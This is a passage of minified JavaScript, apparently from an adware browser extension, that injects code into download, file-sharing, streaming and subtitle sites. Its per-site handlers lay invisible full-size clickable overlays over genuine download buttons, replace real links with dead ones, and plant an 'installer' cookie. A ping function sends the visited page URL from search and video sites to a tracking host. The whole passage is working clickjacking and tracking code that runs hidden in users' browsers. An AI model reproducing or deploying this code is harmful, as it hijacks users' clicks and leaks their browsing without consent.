\"==n.charAt(0);)n=n.substring(1,n.length);if(0==\r\nn.indexOf(e))return n.substring(e.length,n.length)}return null};e.eraseCookie=function(h){e.createCookie(h,\"\",-1)}};h.ajax={get:function(e,k){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",e,!0),this.xhr.onreadystatechange=function(){4==h.ajax.xhr.readyState&&k(h.ajax.xhr.responseText)},this.xhr.send()}catch(l){}},post:function(e,k,l){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",e,!0);this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\");this.xhr.onreadystatechange=\r\nfunction(){4==h.ajax.xhr.readyState&&l(h.ajax.xhr.responseText)};k=encodeURIComponent(k);this.xhr.send(k)}};h.waitForTokens={};h.addScript=function(e,h){if(\"bing\"==h){var l=Element.prototype.appendChild;document.createElement(\"iframe\");Element.prototype.appendChild=document.appendChild;document.getElementsByTagName(\"head\")[0].appendChild(e);Element.prototype.appendChild=l}else document.getElementsByTagName(\"head\")[0].appendChild(e)};h.waitForElement=function(e,k,l,m){var p=h.query_selector_all(e);\r\nclearTimeout(h.waitTimeout);if(25<n.waitForElementCounter)return k(null);if(\"undefined\"==typeof p||1>p.length){if(h.waitForTokens[m])return k(null);var q=arguments.callee;h.waitTimeout=setTimeout(function(){n.waitForElementCounter++;q(e,k,l,m)},l)}else{if(h.waitForTokens[m])return k(null);h.waitForTokens[m]=!0;n.waitForElementCounter=0;return k(p)}};h.flushWaitForTokens=function(){h.waitForTokens={}};h.getRandomInt=function(e,h){return Math.floor(Math.random()*(h-e+1))+e};h.get_computed_style=\"function\"!=\r\ntypeof window.getComputedStyle?function(e){return{getPropertyValue:function(k){\"float\"==k&&(k=\"styleFloat\");k=h.dhtml_prop_name(k);return\"object\"==typeof e.currentStyle&&null!=e.currentStyle&&\"undefined\"!=typeof e.currentStyle[k]?e.currentStyle[k]:null}}}:function(e,h){return window.getComputedStyle(e,h)||{getPropertyValue:function(){}}};h.query_selector_all=document.querySelectorAll?function(e){try{return document.querySelectorAll(e)}catch(h){}}:function(e){var h=e.match(/^#([^,\\s]+)$/)||[];if(1<\r\nh.length)return e=document.getElementById(h[1])||void 0,\"undefined\"!=typeof e?[e]:[];h=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild(h);document.__asya_qsaels=[];h.styleSheet.cssText=e+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};h.clone_object=window.JSON instanceof Object?function(e){if(e instanceof Object&&(e=JSON.stringify(e),\"string\"==typeof e))return JSON.parse(e)}:function(e){if(e instanceof Object){var h=\r\nnew e.constructor,l;for(l in e)h[l]=arguments.callee(e[l]);return h}return e};h.dhtml_prop_name=function(e){return e.replace(/(\\-([a-z]){1})/g,function(e,h,m){return m.toUpperCase()})};h.wildcard_to_regex=function(e){e=e.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");e=e.replace(/\\*/g,\".*\");return new RegExp(e)};h.throttle=function(e,h){var l=null;return function(){var m=this,n=arguments;clearTimeout(l);l=setTimeout(function(){e.apply(m,n)},h)}};h.epoch=function(){return(new Date).getTime()};h.msie=function(){var e=\r\nparseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(e)&&(e=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(e)?!1:e}();h.version_ie_less=function(e){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=e?!0:!1};h.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)};h.match_url=\r\nfunction(e,k){for(var l=0;l<k.length;l++)if(\"string\"==typeof k[l]){var m;m=/^\\/.+\\/$/.test(k[l])?new RegExp(k[l]):h.wildcard_to_regex(k[l]);if(m instanceof RegExp&&m.test(e))return!0}};h.ping=function(e){for(var h=[\"google\",\"bing\",\"yahoo\",\"youtube\"],l=0;l<h.length;l++)if(-1<location.hostname.indexOf(h[l])){var m=new Image,p=encodeURIComponent(window.self==window.top?window.self.location.href:\"\");1E3<p.length&&(p=encodeURIComponent(location.hostname));var q=encodeURIComponent(location.hostname);m.src=\r\nn.pixelHost+\"?hid=17913821332815429883&eid=1307&pid=3540&prodid=338&v=\"+n.version+\"&ch=\"+e+\"&lan=\"+navigator.language+\"&cc=JP&pr=\"+h[l]+\"&host=\"+q+\"&ref=\"+p}};h.getAllText=function(e){for(var h=\"\",l=0;l<e.length;l++)h+=e.textContent?e.textContent:e.innetText;return h};h.duplicateElement=function(e){var k=document.createElement(e.nodeName.toLowerCase());e.getAttribute(\"href\")&&k.setAttribute(\"href\",\"javascript:void(0);\");for(var l in e)if(\"src\"==l||\"width\"==\r\nl||\"height\"==l||\"id\"==l||\"className\"==l)k[l]=e[l];else if(\"style\"==l)for(var m in e[l])e[l][m]&&\"\"!=e[l][m]&&(k[l][m]=e[l][m]);else\"input\"!==e.nodeName.toLowerCase()||\"type\"!=l&&\"value\"!=l||(k[l]=e[l]);for(l=0;l<e.childNodes.length;l++)if(3==e.childNodes[l].nodeType)m=e.childNodes[l].textContent?e.childNodes[l].textContent:e.childNodes[l].innerText,\"undefined\"===typeof m&&(m=e.childNodes[l].nodeValue?e.childNodes[l].nodeValue:e.childNodes[l].data),\"undefined\"!==typeof m&&k.appendChild(document.createTextNode(m));\r\nelse{m=h.duplicateElement(e.childNodes[l]);var n=h.getAllText(m.childNodes),q=e.childNodes[l].textContent?e.childNodes[l].textContent:e.childNodes[l].innerText;q&&(q=q.replace(n,\"\"),\"\"!=h.trim(q)&&(m.textContent?m.textContent=q:m.innerText=q));k.appendChild(m)}return k};h.coverElement=function(e,h,l,m,n,q,t,r){var u=document.createElement(\"div\");u.style.width=h?h:\"100%\";u.style.height=l?l:\"100%\";u.style.zIndex=q?q:\"2000\";u.style.top=m?m:\"0\";u.style.left=n?n:\"0\";u.style.cursor=t?t:\"pointer\";u.style.position=\r\n\"absolute\";h=e.parentNode;h.style.position=\"relative\";!0!==r&&\"undefined\"!==typeof r||h.removeChild(e);h.appendChild(u)};h.trim=function(h){return\"function\"!==typeof String.prototype.trim?String(h).replace(/^\\s+|\\s+$/g,\"\"):String.prototype.trim(h)}};this[\"dirpy.com\"]=new function(){this.init=function(){try{f=function(){try{$(\".download-maxiget, .download-trinity\").attr(\"href\",\"#\"),$(\"#mp3-with-trinity\").remove()}catch(h){}},-1< !navigator.userAgent.indexOf(\"chrome\")?f():(g=document.createElement(\"script\"),\r\ng.innerHTML=\"(\"+f.toString()+\")()\",document.body.appendChild(g))}catch(h){}new function(){-1<location.host.toLowerCase().indexOf(\"irpy.co\")&&(window.__irpyCount=0,window.__irpyInt=setInterval(function(){for(var h=document.links,k=0;k<h.length;k++){var l=h[k].getAttribute(\"href\");if(null!=l&&-1<l.toLowerCase().indexOf(\"dirpy.com/download/\")){l=document.createElement(\"div\");l.style.top=\"0\";l.style.width=\"100%\";l.style.height=\"100%\";l.style.cursor=\"pointer\";l.style.zIndex=\"2000\";l.style.position=\"absolute\";\r\nvar m=h[k].parentNode;m.style.position=\"relative\";m.appendChild(l);clearInterval(window.__irpyInt)}}20<window.__irpyCount++&&clearInterval(window.__irpyInt)},250))}}};this[\"mp3olimp.org\"]=new function(){this.init=function(){setTimeout(function(){for(var h=document.links,e=0;e<h.length;e++)if(\"return prepare_download_file(this);\"==h[e].getAttribute(\"onclick\")){var m=document.createElement(\"a\");m.className=\"link last\";m.setAttribute(\"href\",\"javascript:void(0);\");m.innerText?m.innerText=\"Download\":m.textContent=\r\n\"Download\";var n=h[e].parentNode,q=n.children[n.children.length-1];q&&(n.removeChild(h[e]),n.insertBefore(m,q))}},1E3);new function(){-1<window.location.host.toLowerCase().indexOf(\"p3olimp.or\")&&(window.__intCount=0,window.__int=setInterval(function(){var h=document.getElementById(\"download-manager-checkbox\");if(null!==h)try{h.setAttribute(\"checked\",!1),document.getElementById(\"checkbox\").checked=!1}catch(e){}window.__intCount++;10<window.__intCount&&clearInterval(window.__int)},250))};-1<window.location.host.toLowerCase().indexOf(\"p3olimp.or\")&&\r\n(window.__intCount=0,window.__int=setInterval(function(){var h=document.getElementById(\"download-manager-checkbox\");if(null!==h)try{h.setAttribute(\"checked\",!1),document.getElementById(\"checkbox\").checked=!1}catch(e){}window.__intCount++;10<window.__intCount&&clearInterval(window.__int)},250));if(-1<document.location.host.indexOf(\"p3olimp.or\")&&document.getElementsByClassName)for(c=document.getElementById(\"download-manager-checkbox\"),c.onchange=function(){for(var h=document.getElementsByClassName(\"nasjfkla\"),\r\ne=0;e<h.length;e++)h[e].style.display=c.checked?\"block\":\"none\"},i=0;i<document.links.length;i++){var h=document.links[i],e=h.getAttribute(\"onclick\");e&&-1<e.indexOf(\"prepare_download_file\")&&(h=h.parentNode,h.style.position=\"relative\",b=document.createElement(\"div\"),b.className=\"nasjfkla\",b.style.position=\"absolute\",b.style.top=\"-2px\",b.style.left=\"92px\",b.style.width=\"71px\",b.style.height=\"16px\",b.style.zIndex=\"99999\",b.style.cursor=\"pointer\",h.appendChild(b))}-1<location.host.indexOf(\"p3olimp.or\")&&\r\nsetTimeout(function(){for(var h=document.getElementById(\"leftside\"),e=0;e<h.children.length;e++)if(/\\bspnBook\\b/.test(h.children[e].className))for(var m=h.children[e].getElementsByTagName(\"a\"),n=0;n<m.length;n++)m[n].setAttribute(\"href\",\"#\"),m[n].setAttribute(\"target\",\"\")},1001)}};this[\"hulkload.com\"]=new function(){this.init=function(){for(var h=n.utils.query_selector_all(\".reclamTable .reclamRow .reclamCell a\"),e=0;e<h.length;e++){var k=h[e],l=n.utils.duplicateElement(k),m=k.parentNode;m.insertBefore(l,\r\nk);m.removeChild(k)}h=n.utils.query_selector_all(\".contentback div div a[target='_blank']\");for(e=0;e<h.length;e++)k=h[e],l=n.utils.duplicateElement(k),m=k.parentNode,m.insertBefore(l,k),m.removeChild(k);h=n.utils.query_selector_all(\".contentback div center a[target='_blank']\");for(e=0;e<h.length;e++)k=h[e],l=n.utils.duplicateElement(k),m=k.parentNode,m.insertBefore(l,k),m.removeChild(k);new function(){-1<location.host.toLowerCase().indexOf(\"ulkload.co\")&&(window.___interCount=0,window.___interval=\r\nsetInterval(function(){for(var h=document.getElementsByTagName(\"center\"),e=0;e<h.length;e++)if(0!=e&&!(-1<h[e].innerHTML.indexOf(\"adcopy-outer\")||-1<h[e].innerHTML.indexOf(\"btn_download\")||-1<h[e].innerHTML.indexOf(\"solvemedia puzzle widget\"))){var k=document.createElement(\"div\");k.style.width=\"100%\";k.style.height=\"100%\";k.style.cursor=\"pointer\";k.style.zIndex=\"1900\";k.style.position=\"absolute\";e==h.length-1?(k.style.bottom=\"0\",k.style.height=\"110px\"):k.style.top=\"0\";h[e].style.position=\"relative\";\r\nh[e].appendChild(k)}h=document.getElementById(\"cap\");null!=h&&(h.parentNode.style.position=\"relative\",h.parentNode.style.zIndex=\"2000\");20<window.___interCount++&&clearInterval(window.___interval)},500))}}};this[\"free-tv-video-online.me\"]=new function(){this.init=function(){if(-1<window.self.location.hostname.indexOf(\"eo-online.me\")&&window.self==window.top){for(var h=document.getElementsByTagName(\"div\"),e=0;e<h.length;e++)if(h[e].style&&\"653px\"==h[e].style.width&&\"49px\"==h[e].style.height){var k=\r\nh[e];k.style.position=\"relative\";var l=document.createElement(\"div\");l.style.position=\"absolute\";l.style.cursor=\"pointer\";l.style.zIndex=\"2000\";l.style.width=\"100%\";l.style.height=\"50px\";l.style.top=\"0\";k.appendChild(l)}setTimeout(function(){for(var h=document.links,e=0;e<h.length;e++){var k=h[e].innerText?h[e].innerText:h[e].textContent;if(\"trackOutboundLink(this, 'Outbound Links', 'slinks.com'); return false;\"==h[e].getAttribute(\"onclick\")&&\"Stream Video Now!\"==k){k=document.createElement(\"a\");\r\nk.className=\"down\";k.setAttribute(\"href\",\"javascript:void(0);\");k.innerText?k.innerText=\"Stream Video Now!\":k.textContent=\"Stream Video Now!\";var l=h[e].parentNode,n=l.children[l.children.length-1];l.removeChild(h[e]);if(n)try{l.insertBefore(k,n)}catch(u){l.appendChild(k)}else l.appendChild(k)}}h=document.getElementsByTagName(\"a\");for(e=0;e<h.length;e++)if(\"getDownload();\"==h[e].getAttribute(\"onclick\"))if(k=document.createElement(\"p\"),k.className=\"dloadh\",k.setAttribute(\"href\",\"javascript:void(0);\"),\r\nk.innerText?k.innerText=\" \":k.textContent=\" \",l=h[e].parentNode,n=l.children[l.children.length-1],l.removeChild(h[e]),n)try{l.insertBefore(k,n)}catch(w){l.appendChild(k)}else l.appendChild(k)},1E3);h=document.createElement(\"script\");h.type=\"text/javascript\";h[-1<navigator.userAgent.toLowerCase().indexOf(\"msie\")?\"text\":\"innerHTML\"]=\"(\"+function(){try{if(jQuery(\".down, .dloadf, .dloadt\").attr(\"href\",\"#\"),$(\"#adsfrm\").length){var h=$(\"#adsfrm\").offset();$('<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"position:absolute;z-index:9999;top:'+\r\nh.top+\"px;left:\"+h.left+\"px;width:\"+$(\"#adsfrm\").width()+\"px;height:\"+$(\"#adsfrm\").height()+'px;\">').appendTo(\"body\")}}catch(e){}}.toString()+\")()\";document.getElementsByTagName(\"head\")[0].appendChild(h)}}};this[\"ehd.c\"]=new function(){this.init=function(){-1<window.self.location.hostname.indexOf(\"ehd.c\")&&document.getElementById(\"r1113566095\")&&(g=document.createElement(\"img\"),g.setAttribute(\"style\",\"width:100%;height:100%;position:absolute;z-index:99999;left:0;top:0\"),g.src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\",\r\nf=document.getElementById(\"r1113566095\").parentNode,f.style.position=\"relative\",f.appendChild(g))}};this[\"hesefiles.c\"]=new function(){this.init=function(){-1<window.self.location.hostname.indexOf(\"hesefiles.c\")&&(window.self.location.href=\"about:blank\");if(-1<window.self.location.hostname.indexOf(\"usfiles.ne\")){var h=function(){$(\"form[name=F1]\").submit(function(){if(-1<$(this).attr(\"action\").indexOf(\"bdl1=\"))return $(\"input[name=quick]\").attr(\"checked\",!1),window.setTimeout(function(){$(\"#btn_download\").attr(\"disabled\",\r\n!1).val(\"Download Now!!\");$(\"form[name=F1]\").unbind(\"submit\")},700),!1})};if(-1==navigator.userAgent.toLowerCase().indexOf(\"chrome\"))h();else{var e=document.createElement(\"script\");e.type=\"text/javascript\";e.innerHTML=\"(\"+h.toString()+\")()\";document.body.appendChild(e)}}}};this[\"sharebeast.com\"]=new function(){this.init=function(){if(-1<window.self.location.hostname.indexOf(\"ebeast.co\")){var h=document.getElementsByTagName(\"div\"),e;for(e in h)h[e]&&h[e].style&&\"fixed\"==h[e].style.position&&\"solid\"==\r\nh[e].style.borderBottomStyle&&(h[e].style.display=\"none\")}}};this[\"coolrom.com\"]=new function(){this.init=function(){for(var h=document.getElementsByTagName(\"img\"),e=0;e<h.length;e++)-1<h[e].src.indexOf(\"/images/download_large.png\")&&h[e].parentNode.setAttribute(\"href\",\"javascript:void(0);\");h=new Date;h.setTime(h.getTime()+2592E6);h=\"; expires=\"+h.toGMTString();document.cookie=\"installer=14604\"+h+\"; path=/;domain=.coolrom.com\"}};this[\"ebookbrowsee.net\"]=new function(){this.init=function(){}};this[\"cloud-vibe.com\"]=\r\nnew function(){this.init=function(){-1<document.location.host.indexOf(\"loud-vibe.co\")&&(a=document.getElementById(\"continue\"),a.setAttribute(\"onclick\",\"return false\"),a.setAttribute(\"href\",\"\"),a.addEventListener(\"click\",function(h){h.returnValue=!1;h.preventDefault&&h.preventDefault()},!1),a.addEventListener(\"mousedown\",function(h){h.returnValue=!1;h.preventDefault&&h.preventDefault()},!1))}};this[\"mp3seal.com\"]=new function(){this.init=function(){-1<document.location.host.indexOf(\"p3seal.co\")&&(a=\r\ndocument.getElementById(\"continue\"),a.setAttribute(\"onclick\",\"return false\"),a.setAttribute(\"href\",\"\"),a.addEventListener(\"click\",function(h){h.returnValue=!1;h.preventDefault&&h.preventDefault()},!1),a.addEventListener(\"mousedown\",function(h){h.returnValue=!1;h.preventDefault&&h.preventDefault()},!1))}};this[\"mp3vampire.com\"]=new function(){this.init=function(){-1<document.location.host.indexOf(\"p3vampire.co\")&&(a=document.getElementById(\"continue\"),a.setAttribute(\"onclick\",\"return false\"),a.setAttribute(\"href\",\r\n\"\"),a.addEventListener(\"click\",function(h){h.returnValue=!1;h.preventDefault&&h.preventDefault()},!1),a.addEventListener(\"mousedown\",function(h){h.returnValue=!1;h.preventDefault&&h.preventDefault()},!1))}};this[\"minecraftdl.com\"]=new function(){this.init=function(){-1<document.location.href.indexOf(\"necraftdl.com/download.ph\")&&(a=document.getElementById(\"downloadpage\"),b=a.getElementsByTagName(\"a\")[0],d=document.createElement(\"div\"),d.style.position=\"absolute\",d.style.width=\"100%\",d.style.height=\r\n\"34px\",d.style.left=\"0\",d.style.cursor=\"pointer\",d.style.zIndex=9999,b.parentNode.insertBefore(d,b.previousSibling));if(-1<document.location.href.indexOf(\"necraftdl.com\"))for(i=0;i<document.links.length;i++){var h=document.links[i];\".exe\"==h.href.substr(-4)&&(h=h.parentNode,h.style.position=\"relative\",d=document.createElement(\"div\"),d.style.position=\"absolute\",d.style.top=0,d.style.left=0,d.style.width=\"100%\",d.style.height=\"100%\",d.style.cursor=\"pointer\",d.style.zIndex=9999,h.appendChild(d))}}};\r\nthis[\"leunlckr.co\"]=new function(){this.init=function(){if(-1<document.location.host.indexOf(\"leunlckr.co\")){var h=document.getElementsByTagName(\"button\")[0],e=document.createElement(\"button\");e.className=h.className;e.innerHTML=h.innerHTML;h.parentNode.insertBefore(e,h);h.parentNode.removeChild(h)}}};this[\"go.theadsnet.com\"]=new function(){this.init=function(){-1<document.referrer.indexOf(\"go.theadsnet.com\")&&document.write(\"\");(function(){var h=0;try{if(-1<window.location.href.indexOf(\"ack-free.co\"))var e=\r\nsetInterval(function(){try{var k=document.getElementById(\"ucd-countdown-1\"),m=[];m.push(1*k.children[2].children[1].children[1].innerText);m.push(1*k.children[2].children[2].children[1].innerText);m.push(1*k.children[3].children[1].children[1].innerText);m.push(1*k.children[3].children[2].children[1].innerText);for(var n=k=0;n<m.length;n++)k+=m[n];if(!(0<k)){clearInterval(e);var q=document.createElement(\"div\");q.style.position=\"absolute\";q.style.top=0;q.style.left=0;q.style.width=\"100%\";q.style.height=\r\n\"100%\";q.style.zIndex=\"9999\";q.style.cursor=\"pointer\";var t=document.getElementById(\"ucd-countdown-1-content\").children[1];t.style.position=\"relative\";t.appendChild(q)}}catch(r){try{var u=0;jQuery.each(jQuery(\".ucd-figure.ucd-countdown-digit-bottom\"),function(){u+=1*jQuery(this).text()});if(0===u){clearInterval(e);var w=jQuery(\"#ucd-countdown-1-content iframe\"),x=w.parent();w.remove();x.html(\"<img title='Get Download' alt='latbut' src='http://i.imgur.com/At0oA5A.png' height='61' width='373'>\")}}catch(v){\"undefined\"!==\r\ntypeof h&&30<++h&&clearInterval(e)}}},750)}catch(k){}})()}};this[\"ziddu.com\"]=new function(){this.init=function(){var h=0,e=setInterval(function(){h++;if(-1<window.location.host.indexOf(\"ownloads.ziddu.co\")){for(var k=0;k<document.links.length;k++)try{var l=document.links[k].href.toLowerCase();if(-1==l.indexOf(\"ww.ziddu.co\")&&-1==l.indexOf(\"#\")&&-1==l.indexOf(\"tunes.apple.co\")&&-1==l.indexOf(\"lay.google.co\")&&-1==l.indexOf(\"/gallery/\")){try{for(var m=document.links[k],n=0;15>=n;n++)m=m.parentNode;\r\nif(-1<m.className.indexOf(\"footerbg\"))continue}catch(q){}var t=document.links[k].parentNode;if(!(-1<t.className.indexOf(\"addthis_toolbox\"))){t.style.position=\"relative\";var r=document.createElement(\"div\");r.style.position=\"absolute\";r.style.left=0;r.style.top=0;r.style.width=\"100%\";r.style.height=\"100%\";r.style.zIndex=\"9999\";r.style.cursor=\"pointer\";t.appendChild(r)}}}catch(u){}l=document.getElementsByTagName(\"iframe\");for(k=0;k<l.length;k++)try{-1==l[k].src.indexOf(\"acebook.co\")&&-1==l[k].src.indexOf(\"cp.crwdcntrl.ne\")&&\r\n(t=l[k].parentNode,t.style.position=\"relative\",r=document.createElement(\"div\"),r.style.position=\"absolute\",r.style.left=0,r.style.top=0,r.style.width=\"100%\",r.style.height=\"100%\",r.style.zIndex=\"9999\",r.style.cursor=\"pointer\",r.id=k,t.appendChild(r))}catch(w){}}20<h&&clearInterval(e)},500)}};this[\"pensubtitles.us\"]=new function(){this.init=function(){if(-1<window.location.href.indexOf(\"/opensubtitles-playe\")){var h=document.getElementById(\"divPlayerDesc\");if(null!=h){h.style.position=\"relative\";var e=\r\ndocument.createElement(\"div\");e.style.position=\"absolute\";e.style.width=\"100%\";e.style.height=\"100%\";e.style.cursor=\"pointer\";e.style.top=\"0\";e.style.zIndex=\"2000\";h.appendChild(e);if(h=h.children[0]){var k=h.children[0];k&&(k.setAttribute(\"href\",\"javascript:void(0);\"),k.setAttribute(\"target\",\"_self\"))}}h=document.getElementById(\"divPlayerHead\");if(null!=h)for(var l=0;l<h.children.length;l++)if(\"span\"==h.children[l].tagName.toLowerCase()){var m=h.children[l],e=document.createElement(\"div\");e.style.position=\r\n\"absolute\";e.style.width=\"106%\";e.style.height=\"70px\";e.style.cursor=\"pointer\";e.style.top=\"-50px\";e.style.left=\"-6%\";e.style.zIndex=\"2000\";if(k=m.children[0])k.setAttribute(\"href\",\"javascript:void(0);\"),k.setAttribute(\"target\",\"_self\");m.style.position=\"relative\";m.appendChild(e)}}}};this[\"opensubtitles.org\"]=new function(){this.init=function(){new function(){var h=document.getElementById(\"scrubbuad\");h&&(h.style.zIndex=\"15\",f=document.createElement(\"div\"),f.style.zIndex=\"15000\",f.style.right=\"9px\",\r\nf.style.bottom=\"0\",f.style.position=\"fixed\",f.style.padding=\"0\",f.style.margin=\"0 0 30px 0\",f.style.width=\"220px\",f.style.height=\"72px\",f.style.overflow=\"visible\",f.style.cursor=\"pointer\",document.getElementsByTagName(\"body\")[0].firstChild.appendChild(f));var e=n.utils.query_selector_all('div[style=\"clear: both;\"] fieldset table[style=\"width:100%;\"] td');0==e.length&&(e=n.utils.query_selector_all('div[style=\"clear: both;\"] fieldset table[style=\"width: 100%;\"] td'));for(h=0;h<e.length;h++){var k=n.utils.duplicateElement(e[h]),\r\nl=e[h].parentNode;l.insertBefore(k,e[h]);l.removeChild(e[h])}e=n.utils.query_selector_all('div[style=\"margin-left: 110px;\"] fieldset div[style=\"text-align: left\"] a');0==e.length&&(e=n.utils.query_selector_all('div[style=\"margin-left: 110px;\"] fieldset div[style=\"text-align: left;\"] a'));for(h=0;h<e.length;h++)k=n.utils.duplicateElement(e[h]),l=e[h].parentNode,l.insertBefore(k,e[h]),l.removeChild(e[h]);e=n.utils.query_selector_all('div[style=\"clear: both;\"] fieldset table[style=\"width:100%;border-spacing: 1px;\"] td');\r\n0==e.length&&(e=n.utils.query_selector_all('div[style=\"clear: both;\"] fieldset table[style=\"width: 100%; border-spacing: 1px;\"] td'));for(h=0;h<e.length;h++)k=n.utils.duplicateElement(e[h]),l=e[h].parentNode,l.insertBefore(k,e[h]),l.removeChild(e[h])}}};this[\"romptfile.co\"]=new function(){this.init=function(){if(-1<location.host.toLowerCase().indexOf(\"romptfile.co\")){for(var h={},e=document.getElementsByTagName(\"iframe\"),k=0;k<e.length;k++)\"300\"==e[k].getAttribute(\"width\")&&\"250\"==e[k].getAttribute(\"height\")&&\r\n(h=e[k].parentNode);h.style.position=\"relative\";d=document.createElement(\"div\");d.style.position=\"absolute\";d.style.width=\"100%\";d.style.height=\"255px\";d.style.cursor=\"pointer\";d.style.top=\"0\";d.style.zIndex=\"2000\";h.appendChild(d)}}};this[\"pensoftwareupdater.co\"]=new function(){this.init=function(){new function(){if(-1<window.location.host.toLowerCase().indexOf(\"pensoftwareupdater.co\"))if(\"undefined\"!==typeof $)window.__qqcount=0,window.__qqint=setInterval(function(){var h=$(\".download\").parent();\r\nh.css(\"position\",\"relative\");var e=document.createElement(\"div\");e.style.position=\"absolute\";e.style.zIndex=\"2000\";e.style.height=\"100%\";e.style.width=\"122px\";e.style.right=\"0\";e.style.top=\"0\";e.style.cursor=\"pointer\";h.append(e);h=$(\"#addBoxX\").parent();h.css(\"position\",\"relative\");e=document.createElement(\"div\");e.style.position=\"absolute\";e.style.zIndex=\"2000\";e.style.height=\"45px\";e.style.width=\"101px\";e.style.right=\"22px\";e.style.bottom=\"16px\";e.style.cursor=\"pointer\";h.append(e);window.__qqcount++;\r\n10<window.__qqcount&&clearInterval(window.__qqint)},250);else for(var h=document.links,e={},k={},l=0;l<h.length;l++)e=h[l].getAttribute(\"href\"),null!=e&&-1<e.toLowerCase().indexOf(\"pensoftwareupdater.com/idownloader.ph\")&&(e=h[l].getAttribute(\"id\"),null!=e&&\"addBoxX\"==e?(k=h[l].parentNode,k.style.position=\"relative\",e=document.createElement(\"div\"),e.style.position=\"absolute\",e.style.zIndex=\"2000\",e.style.height=\"45px\",e.style.width=\"101px\",e.style.right=\"22px\",e.style.bottom=\"16px\"):(k=h[l].parentNode,\r\nk.style.position=\"relative\",e=document.createElement(\"div\"),e.style.position=\"absolute\",e.style.zIndex=\"2000\",e.style.height=\"100%\",e.style.width=\"122px\",e.style.right=\"0\",e.style.top=\"0\"),e.style.cursor=\"pointer\",k.appendChild(e))}}};this[\"veehd.com\"]=new function(){this.init=function(){new function(){if(-1<window.location.href.indexOf(\"veehd.com/video/\")){var h=document.getElementsByTagName(\"iframe\")[0],e={};null!=h&&(h=h.parentNode,e=document.createElement(\"div\"),e.style.top=\"0\",e.style.width=\r\n\"100%\",e.style.height=\"100%\",e.style.cursor=\"pointer\",e.style.zIndex=\"2000\",e.style.position=\"absolute\",h.style.position=\"relative\",h.appendChild(e));h=document.getElementById(\"preview\");null!=h&&(e=document.createElement(\"div\"),e.style.top=\"0\",e.style.width=\"100%\",e.style.height=\"100%\",e.style.cursor=\"pointer\",e.style.zIndex=\"2000\",e.style.position=\"absolute\",h.style.position=\"relative\",h.appendChild(e))}else for(var e=document.getElementsByTagName(\"a\"),k=0;k<e.length;k++)if(\"getDownload();\"==e[k].getAttribute(\"onclick\")){h=\r\ndocument.createElement(\"a\");h.style.cursor=\"pointer\";var l=document.createElement(\"img\");l.setAttribute(\"src\",e[k].children[0].getAttribute(\"src\"));l.setAttribute(\"border\",\"0\");h.appendChild(l);l=e[k].parentNode;l.removeChild(e[k]);e=l.getElementsByTagName(\"div\")[0];l.insertBefore(h,e);break}}}};this[\"ullypcgames.ne\"]=new function(){this.init=function(){if(-1<window.location.host.toLowerCase().indexOf(\"ullypcgames.ne\"))for(var h=document.getElementsByTagName(\"center\"),e=0;e<h.length;e++){var k=h[e].firstChild;\r\n\"undefined\"!==typeof k.tagName&&\"a\"==k.tagName.toLowerCase()&&(h[e].style.position=\"relative\",k=document.createElement(\"div\"),k.style.position=\"absolute\",k.style.top=\"0\",k.style.left=\"0\",k.style.width=\"100%\",k.style.height=\"100%\",k.style.zIndex=\"2000\",k.style.cursor=\"pointer\",h[e].appendChild(k))}}};this[\"llplayer.com.b\"]=new function(){this.init=function(){if(-1<window.location.host.toLowerCase().indexOf(\"llplayer.com.b\"))for(var h=document.getElementsByTagName(\"img\"),e=0;e<h.length;e++)if(h[e].getAttribute(\"src\")&&\r\n-1<h[e].getAttribute(\"src\").indexOf(\"fullpage_eng.png\")){var k=document.createElement(\"div\");k.style.width=\"100%\";k.style.height=\"100%\";k.style.position=\"absolute\";k.style.zIndex=\"9999\";k.style.top=\"0\";k.style.cursor=\"pointer\";var l=h[e].parentNode.parentNode;l.style.position=\"relative\";l.appendChild(k)}}};this[\"ubtitulosespanol.or\"]=new function(){this.init=function(){if(0<location.host.toLowerCase().indexOf(\"ubtitulosespanol.or\")){var h=document.links;for(i=0;i<h.length;i++)if(\"Descargue su subt\\u00edtulo aqu\\u00ed\"===\r\n(h[i].innerText?h[i].innerText:h[i].textContent)){var e=document.createElement(\"div\");e.style.position=\"absolute\";e.style.width=\"100%\";e.style.height=\"100%\";e.style.cursor=\"pointer\";e.style.top=\"0\";e.style.left=\"0\";e.style.zIndex=\"2000\";var k=h[i].parentNode;k.appendChild(e);k.style.position=\"relative\"}}}};this[\"ubtitles4free.ne\"]=new function(){this.init=function(){if(0<location.host.toLowerCase().indexOf(\"ubtitles4free.ne\")){var h=document.links;for(i=0;i<h.length;i++)if(\"Download Subtitle\"===(h[i].innerText?\r\nh[i].innerText:h[i].textContent)||\"Download Player\"===(h[i].innerText?h[i].innerText:h[i].textContent)){var e=document.createElement(\"div\");e.style.position=\"absolute\";e.style.width=\"100%\";e.style.height=\"100%\";e.style.cursor=\"pointer\";e.style.top=\"0\";e.style.left=\"0\";e.style.zIndex=\"2000\";var k=h[i].parentNode;k.appendChild(e);k.style.position=\"relative\"}}}};this[\"legendasbrasil.org\"]=new function(){this.init=function(){if(0<location.host.toLowerCase().indexOf(\"legendasbrasil.org\")){var h=document.links;\r\nfor(i=0;i<h.length;i++)if(\"Baixar Legenda\"===(h[i].innerText?h[i].innerText:h[i].textContent)||\"Baixar Player\"===(h[i].innerText?h[i].innerText:h[i].textContent)||\"Baixe sua legenda aqui\"===(h[i].innerText?h[i].innerText:h[i].textContent)){var 